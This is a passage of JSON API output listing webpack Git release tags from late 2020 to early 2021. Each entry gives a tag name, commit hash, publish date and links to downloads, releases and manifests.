ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5